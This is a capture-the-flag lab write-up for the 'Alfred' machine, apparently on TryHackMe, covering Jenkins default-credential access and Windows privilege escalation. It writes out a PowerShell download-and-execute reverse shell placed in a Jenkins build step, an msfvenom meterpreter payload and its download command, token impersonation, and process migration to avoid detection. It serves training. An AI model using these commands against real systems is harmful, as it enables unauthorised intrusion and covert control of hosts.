Alfred
March 19, 2024
Task 1: Initial Access
nmap -oN nmap-all 10.10.108.118 -p- -T4
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-19 13:04 PST
Nmap scan report for 10.10.108.118
Host is up (0.25s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 304.02 secondsFirst we when we visited the IIS website, we can see here the webpage
Then the second one that we visited is the jenkins login page which is located in port 8080 or http-proxy service
After several tries to login we discovered that the login credentials is default
admin:admin
Then this is the dashboard for the jenkins once you log in as an admin
After navigating to the dashboard now we can access the "project" which is a project that is named as project.
Then we will just click configure which is located in the left side of the page. After that scroll down to the bottom part which is the windows batch command or our payload will be placed...
powershell iex (New-Object Net.WebClient).DownloadString('http://10.9.193.229:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.9.193.229 -Port 4444
After we applied and saved our changes to the project we will now click the "Build Now" button to build the project so that our payload will be executed.
We can see here in the console output the reverse shell payload is being processed by the server
And then we got the reverse connection from the server which leads to user bruce
Task 2: Switching Shells
Now we have to switch shell to have a better elevating privilege.
First we have to make a reverse_tcp payload using the msfvenom
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.193.229 LPORT=4445 -f exe -o shell-name.exe
Then we need a listener and we will use the meterpreter for that
We will just upload the payload the same as before how we got the reverse shell connection
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.9.193.229:8000/shell-name.exe','shell-name.exe')"
Just click the build now again
Then payload is now being processed
After we downloaded the malicious exe or the reverse tcp exe. Now we have to get in the box another time using the reverse payload before.
So once again we just apply and save this.
Click the build now
As we get back into the box we can see our newly created malicious exe or the reverse tcp for our meterpreter. We just have to execute it
Start-Process "shell-name.exe"
After we execute the .exe file, now we got the reverse tcp in the meterpreter
First we have to use shell for us to get the normal terminal
Then use the command whoami /priv to view our privilege
After that we will exit from the shell and use the command load incognito
"Incognito allows us to impersonate user tokens. It was first integrated into Metasploit first, then to Meterpreter. In this recipe, we will be covering Incognito and use cases. Tokens are similar to web cookies." - From google
Use the list_tokens -g to view the availabe tokens that we can impersonate
Then just use impersonate_token command and the user that we desire, of course the first user that we will try is administrator
We got the NT authority\system
After that we will get rid of our process in the processes so that we can avoid getting detected
Now view the processes in the box
Just migrate into the services.exe process
When we use the PS command again, now we can't see the shell-name.exe process that we was on before.
Having the highest privilege user in the box will now be able to view the root.txt
Last updated